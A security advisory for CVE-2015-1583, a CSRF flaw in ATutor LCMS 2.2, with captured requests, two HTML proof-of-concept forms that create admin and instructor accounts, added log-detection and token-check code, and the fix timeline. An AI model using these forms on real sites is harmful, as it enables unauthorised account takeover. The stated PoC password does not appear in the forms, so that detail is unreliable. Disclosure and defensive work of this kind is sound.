[CVE-2015-1583] ATutor LCMS – CSRF Vulnerability in Version 2.2


Product Information:

Software: ATutor LCMS

Tested Version: 2.2, released 25.8.2014

Vulnerability Type: Cross-Site Request Forgery, CSRF (CWE-352)

Download link: http://atutor.ca/atutor/download.php

Description: ATutor is an Open Source Web-based Learning Content Management System (LCMS) designed with accessibility and adaptability in mind. (copied from http://www.atutor.ca/credits.php#whatatutor)


Issues:

1) CSRF in administrator creation page

2) CSRF in user creation page


Vulnerability description:

1) CSRF in administrator creation page

When an authenticated administrative user of ATutor LCMS is creating another administrator account, the following POST request is sent to the server:

POST /atutor-2.2/ATutor/mods/_core/users/admins/create.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 187
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: ATutorID=pr6jq1tlfr204nm60p5rtbj0u4; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _gat=1; _ga=GA1.1.621011711.1425057132

form_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94&password_error=&login=csrfadmin9&password=&confirm_password=&real_name=&[email protected]&priv_admin=1&submit=Save

By executing the following Proof-of-Concept, a new administrative user called “csrfadmin99” will be created with the password “1qazXSW@”.

<form action="http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php" method="POST">
    <input name="form_password_hidden" type="hidden" value="ef0f8b6ffb699f90933a3321b00ff6769e018b94" />
    <input name="login" type="hidden" value="csrfadmin99" />
    <input name="real_name" type="hidden" value="csrfadmin99" />
    <input name="email" type="hidden" value="[email protected]" />
    <input name="priv_admin" type="hidden" value="1" />
    <input name="submit" type="hidden" value="Save" />
    <input type="submit" value="Submit request" />
</form>

2) CSRF in user creation page

When an authenticated administrative user of ATutor LCMS is creating a user, the following POST request is sent to the server:

POST /atutor-2.2/ATutor/mods/_core/users/create_user.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 429
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/create_user.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: ATutorID=0h3qqin6ndjmpt21m7f17i07l7; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _gat=1; _ga=GA1.1.621011711.1425057132

ml=&password_error=&form_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94&registration_token=19569b3551f19d60ddfbe4973d1733079f775568&login=csrfuser9&form_password1=&form_password2=&[email protected]&private_email=1&[email protected]&first_name=csrfuser9&second_name=&last_name=csrfuser9&id=&status=3&old_status=&year=&month=&day=&address=&postal=&city=&province=&country=&phone=&website=&submit=+Save+

By executing the following Proof-of-Concept, a new instructor user called “csrfuser99” will be created with the password “1qazXSW@”.

<form action="http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/create_user.php" method="POST">
    <input name="form_password_hidden" type="hidden" value="ef0f8b6ffb699f90933a3321b00ff6769e018b94" />
    <input name="login" type="hidden" value="csrfuser99" />
    <input name="email" type="hidden" value="[email protected]" />
    <input name="private_email" type="hidden" value="1" />
    <input name="email2" type="hidden" value="[email protected]" />
    <input name="first_name" type="hidden" value="csrfuser99" />
    <input name="last_name" type="hidden" value="csrfuser99" />
    <input name="status" type="hidden" value="3" />
    <input name="submit" type="hidden" value="Save" />
    <input type="submit" value="Submit request" />
</form>

Impact:

1) An attacker is able to create an administrator account with super administrator privilege.

2) An attacker is able to create a user account with instructor privilege.
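For operators who cannot apply the patch immediately, the following is an added example (not part of the advisory and not ATutor code) of a detection check over web-server access logs: it flags POSTs to the two endpoints named above whose Referer is missing or names a host other than the application's own. A victim's browser submits the forged form from the attacker's page, so the Referer, when the browser sends one, carries that page's URL. The log lines are constructed in Combined Log Format, and the host names, IP addresses and function names are assumptions made for the example.

```python
import re
from urllib.parse import urlparse

# The two state-changing endpoints named in the advisory.
WATCHED_PATHS = (
    "/atutor-2.2/ATutor/mods/_core/users/admins/create.php",
    "/atutor-2.2/ATutor/mods/_core/users/create_user.php",
)

# Apache/nginx Combined Log Format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the named fields of one log line, or None if it is not in the expected format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_posts(lines, site_host):
    """Return (ip, timestamp, path, reason) for each POST to a watched endpoint whose
    Referer is absent or points at a different host. Browsers can be told not to send a
    Referer at all, so a missing Referer on a state-changing request is reported too.
    This is a detection hint only; the fix is a per-session anti-CSRF token on the server."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        path = rec["path"].split("?", 1)[0]
        if path not in WATCHED_PATHS:
            continue
        referer = rec["referer"]
        if referer in ("", "-"):
            reason = "no referer"
        else:
            ref_host = urlparse(referer).netloc  # includes the port, if any
            if ref_host == site_host:
                continue  # same-site submission, as in the captured requests above
            reason = f"referer host {ref_host}"
        hits.append((rec["ip"], rec["ts"], path, reason))
    return hits


# Constructed sample log: one legitimate submission, one cross-site form post,
# one post with the Referer suppressed, and an unrelated GET.
SAMPLE_LOG = [
    '198.51.100.23 - - [28/Feb/2015:10:15:02 +0000] "POST /atutor-2.2/ATutor/mods/_core/users/admins/create.php HTTP/1.1" 302 0 "http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php" "Mozilla/5.0"',
    '198.51.100.23 - - [28/Feb/2015:10:16:40 +0000] "POST /atutor-2.2/ATutor/mods/_core/users/admins/create.php HTTP/1.1" 302 0 "http://attacker.example/poc.html" "Mozilla/5.0"',
    '198.51.100.23 - - [28/Feb/2015:10:17:05 +0000] "POST /atutor-2.2/ATutor/mods/_core/users/create_user.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [28/Feb/2015:10:17:09 +0000] "GET /atutor-2.2/ATutor/mods/_core/users/create_user.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_posts(SAMPLE_LOG, "127.0.0.1"):
        print(*hit)
```

Run against the constructed sample, the function reports the cross-site post and the post without a Referer, and passes the same-site submission. The Referer is under the browser's control, not the server's, so the check can miss requests and is a triage aid for existing logs rather than a replacement for the token check a fixed handler performs.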


Solution:

Update using the built-in patcher, Patch IDs 0009 and 0011.
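The vendor's patches are not reproduced here. As an added example that is neither ATutor code nor the vendor's fix, the following stand-alone Python model shows the server-side checks that would reject both proof-of-concept forms above. The captured requests carry the same form_password_hidden value in two different sessions, which is why an attacker can copy it into a page of their own; the defence is an unpredictable per-session token, compared in constant time, with a browser-supplied Origin/Referer check as a second layer. SITE_ORIGIN, Session, check_request, run_scenarios and the attacker origin are assumptions made for the example.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Origin of the application, taken from the captured requests in the advisory.
SITE_ORIGIN = "http://127.0.0.1"


class Session:
    """Stand-in for the server-side session store (assumption for this example)."""

    def __init__(self):
        self.csrf_token = None


def issue_csrf_token(session):
    """Mint one unpredictable token per session; the real form embeds it as a hidden field.
    Unlike the static form_password_hidden value, it cannot be copied from a capture into
    an attacker's page, because the attacker never sees the victim's session."""
    if session.csrf_token is None:
        session.csrf_token = secrets.token_hex(32)
    return session.csrf_token


def origin_allowed(headers):
    """Second layer: the browser-set Origin header (or Referer as fallback) must name the site.
    A form posted from another page carries that page's origin, which its scripts cannot alter."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False  # no provenance at all: fail closed for state-changing requests
        parts = urlparse(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def check_request(session, form, headers):
    """Return (accepted, reason) for a state-changing POST such as admins/create.php."""
    if not origin_allowed(headers):
        return False, "origin mismatch"
    submitted = form.get("csrf_token", "")
    expected = session.csrf_token or ""
    if not submitted or not expected:
        return False, "missing csrf token"
    if not hmac.compare_digest(submitted, expected):  # constant-time comparison
        return False, "csrf token mismatch"
    return True, "ok"


# Selected hidden fields of the first proof-of-concept form, as given in the advisory.
POC_ADMIN_FORM = {
    "form_password_hidden": "ef0f8b6ffb699f90933a3321b00ff6769e018b94",
    "login": "csrfadmin99",
    "real_name": "csrfadmin99",
    "priv_admin": "1",
    "submit": "Save",
}


def run_scenarios():
    """Replay the PoC form against the checks and return the outcome of each scenario."""
    session = Session()
    token = issue_csrf_token(session)
    attacker_origin = "http://attacker.example"  # constructed placeholder, not a real site
    same_site = {"Origin": SITE_ORIGIN}
    return {
        "poc_from_attacker_page": check_request(session, POC_ADMIN_FORM, {"Origin": attacker_origin}),
        "poc_fields_same_origin": check_request(session, POC_ADMIN_FORM, same_site),
        "guessed_token": check_request(session, dict(POC_ADMIN_FORM, csrf_token="0" * 64), same_site),
        "legitimate_form": check_request(session, dict(POC_ADMIN_FORM, csrf_token=token), same_site),
    }


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name}: {outcome}")
```

The Origin check alone is not sufficient, since older clients and some proxies drop the header and a Referer can be suppressed by the sending page, which is why the token check fails closed when either value is absent. On current browsers, marking the session cookie SameSite=Lax or Strict is a further layer that stops the cookie from being attached to cross-site form posts in the first place.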


Timeline:

Vulnerability found: 10.2.2015 & 28.2.2015

Vendor informed: 10.2.2015 & 28.2.2015

Response by vendor: 11.2.2015 & 28.2.2015

Fix by vendor: 23.2.2015 & 28.2.2015

Public Advisory: 1.3.2015


This advisory is also available on SecurityFocus.